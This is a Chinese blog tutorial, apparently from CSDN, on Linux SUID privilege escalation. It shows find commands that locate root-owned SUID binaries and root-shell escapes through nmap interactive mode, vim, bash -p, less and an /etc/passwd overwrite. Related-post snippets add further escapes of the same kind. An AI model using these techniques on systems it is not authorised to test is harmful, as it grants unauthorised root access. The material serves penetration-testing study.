Linux提取—suid

已于 2022-04-12 15:33:58 修改
阅读量4.6k 收藏 7
点赞数 1
文章标签: linux 安全
于 2022-04-12 15:30:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40898302/article/details/124123157
版权

什么是SUID

​ SUID (Set UID)是Linux中的一种特殊权限,其功能是用户在运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件。

        在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果ls设置了SUID权限,我们可在非root用户下运行该二进制可执行文件,在执行文件时,该进程的权限将为root权限.,利用此特性,我们可通过SUID进行提权。

怎么设置SUID

可以先查看可执行文件是否有suid权限

ls -alh 文件名

设置suid权限:chmod u+s 可执行文件

取消suid权限:chmod u-s 可执行文件

现在已知的具有suid权限的可执行的二进制文件有以下这些

nmap
vim
find
bash
more
less
nano
cp
awk

        以下的命令可以找到正在系统上运行的所有SUID可执行文件。准确的说,这个命令将从/目录中查找具有SUID权限位且属主为root的文件并输出它们,然后将所有错误重定向到/dev/null,从而仅列出该用户具有访问权限的那些二进制文件。

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

 以上文件都是以suid权限运行并且属主都是为root

 Nmap

适用版本为:nmap2.02 -5.21

在早期nmap版本中,nmap带有交互模式,因而允许用户执行shell命令

使用如下命令进入nmap交互模式:

nmap --interactive

 并通过以下命令提权

nmap> !sh
sh-3.2# whoami
root

msfconsole中也有对应的nmap提权模块

 cp

cp命令可以将/etc/passwd文件覆盖,结合/etc/passwd提权CSDNhttps://mp.csdn.net/mp_blog/creation/editor/124102433find

当find命令有suid权限是

必须要有这个文件(passwd文件可以替换为任何存在的文件)

find passwd -exec whoami \;

 vim

vim为文本编辑器,如果vim具有了suid权限,则可以用root权限读取系统上的任何文件

vim.tiny  /etc/passwd

利用vim进入shell

vim.tiny

#vim命令

:set shell = '/bin/sh'

:shell

Bash

 以下命令将以root身份打开一个bash shell

bash -p

bash-3.2

# id

uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)

less  和 more

less和more命令也可以进入shell

less /etc/passwd

#在less中输入:

!/bin/sh

白冷
关注
Linux提权——环境变量配合SUID&计划任务&第三方数据库
m0_61506558的博客
01-27 741
原始的ps命令,由于环境变量加了tmp,执行ps,即执行/tmp/ps,同时ps是通过bash复制过来的,./shell用SUID执行bash直接进行了提取
Linux学习教程 | 全文目录
关注微信公众号【开源Linux】,后台回复『10T』,领取10T学习资源大放送,涵盖Linux、虚拟化、容器、云计算、网络、Python、Go等书籍和视频
05-02 1108
本教程最大的特点是通俗易懂,并且非常详细,花费 7 天时间即可快速了解 Linux
【渗透测试】--- suid提权
qq_43168364的博客
01-13 843
可以用suid提取的命令(前提是这些命令设置了suid权限) nmap vim nano find bash more less cp awk man 1.nmap 执行:nmap --script=exe.nse,脚本中的内容写:os.execute("/bin/bash") 2.vim 进入vim的编辑模式,执行::set shell=/bin/bash ; :shell 3.nano 执行:nano /etc/passwd , 即可添加root用户 4.find 执行:find /
Linuxsuid
weixin_36142178的博客
12-03 783
suid特殊权限是以命令(可执行文件)的所有者权限来运行这一命令的,而不是以执行者的权限来运行该命令 。 下面举例,查看passwd这个命令的权限 shiyanlou:teshuquanxian/ $ where passwd                               [0:27:58] /usr/bin/passwd shiyanlou:teshuquanxian/ $
Linux 中的特殊文件权限:SUID、GUID 和 Sticky
最新发布
u013669912的博客
08-04 1022
Linux命令find查询suid和sgid
weixin_30276935的博客
07-05 1118
其中“+”和“-”其实一个是逻辑与一个是逻辑或得意思 [root@localhost ~]# find / -perm +4000 -exec ls -ld {} \; -rwsr-xr-x 1 root root 0 07-05 01:36 /root/file -rwsr-xr-x 1 root root 71160 2009-12-16 /sbin/umount.nfs4 -rws...
Linux suid功能
weixin_34185560的博客
05-03 158
suid1.用户对应的前三位的x位上如果有s就表示,suid。当x位上没有x的时候,suid不是S。2.setuid位是让普通用户可以以root(或其他)用户的角色运行只有root(或其他)帐号才能运行的程序或命令,或程序命令对应本来没有权限操作的文件等。(注意和su及sudo的区别)。3.仅对二进制命令或程序有效,不能用在shell等类似脚本文件上(因为shell脚本仅仅是...
linux权限suid
weixin_33910460的博客
10-12 266
1.创建文件1.txt,属于root用户,root组,权限为7002.创建程序文件#include <stdio.h>#include <stdlib.h>#include <string.h>#include <unistd.h>#include <fcntl.h> #define BUFFSIZE 10 int main(){int ...
linux提取辅助脚本
05-06
linux提取辅助脚本-自动扫描suid,sgid,特权用户等
Linux操作系统零基础入门学习-视频教程网盘链接提取码下载.txt
09-18
- **特殊权限**:如SUID、SGID等。 - **磁盘分区与挂载**: - **分区**:使用工具如`fdisk`或`parted`进行硬盘分区。 - **格式化**:使用`mkfs`命令对分区进行格式化。 - **挂载**:使用`mount`命令将分区挂载...
Liunx特权suid(suig) chattr与进程掩码umask
benziwu的博客
03-17 407
1 suid(sgid)针对文件、程序时,具备临时提升权限; suid 是针对文件所设置的一个特别的权限 功能:是调用文件的用户,临时具备属主的能力; [root@localhost alice]# chmod u+s /usr/bin/cat [root@localhost alice]# ll /usr/bin/c [root@localhost alice]# ll /usr/bin/cat -rwsr-xr-x. 1 root 0 54080 3月 17 13:51 /u...
Linux中的SUID
LDYLDYss的博客
08-01 1530
SUID是Set UID的简称,翻译过来就是设置用户ID。它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时。 例如,使用如下命令: ls -l /usr/bin/passwd 我们会得到如下的结果: -rwsr-xr-x 1 root root 42824 Sep 13 2012 /usr/bin/passwd ** SUID和SGID的详细解析 ** 由于SUID和SGID是...
linux系统suid提权
focus on security
05-19 5617
SUID提权 0x01什么是SUIDSUID (Set UID)是Linux中的一种特殊权限,其功能为用户运行某个程序时,如果该程序有SUID权限,那么程序运行为进程时,进程的属主不是发起者,而是程序文件所属的属主。但是SUID权限的设置只针对二进制可执行文件,对于非可执行文件设置SUID没有任何意义. ​ 在执行过程中,调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效. 通俗的来讲,假设我们现在有一个可执行文件ls,其属主为root,当我们通过非root用户登录时,如果
Linux提权之suid
2301_76227305的博客
04-02 1433
以上总结的是常见的suid提权,后续会持续跟新。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Linux 安全 - SUID机制
小立仔
09-28 2788
Linux 安全 - SUID机制简介
Linux文件的特殊权限(SUID|SGID|SBIT)
qq_70756940的博客
04-17 2079
SUID是一种对二进制程序进行设置的特殊权限,能够让二进制程序的执行者临时拥有所有者的权限(仅对拥有执行权限的二进制程序有效)。
linux特殊权限(suid、sgid、sbit)
m0_71163619的博客
06-05 2431
特殊权限suid、sgid、sbit
linux suid命令的功能,Linux命令學習筆記(3)——理解SUID,SGID,stick
weixin_42160252的博客
05-03 160
http://www.newwhy.com/2010/0915/15015.html了解這三個特殊訪問位前先了解Linux文件訪問特權位:1514131211109876543210SUIDSGIDstickyrwxrwxrwx文件類型位特殊訪問位擁有者特權位同組特權位其他用戶特權位10. SUID(set-user-ID)位SUID位的作用:若文件F設置SUID位為1,文件F的擁有者是用戶A,而...
SUID提权
热门推荐
一只web狗
07-01 1万+
SUID提权介绍
linux 查找 SUID
04-29
您可以使用以下命令来查找 SUID 标志的文件: ``` find / -perm -4000 -type f 2>/dev/null ``` 这将在根目录下查找所有带有 SUID 标志的文件,并将结果输出到终端。其中 `-perm -4000` 表示查找权限为 4000 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值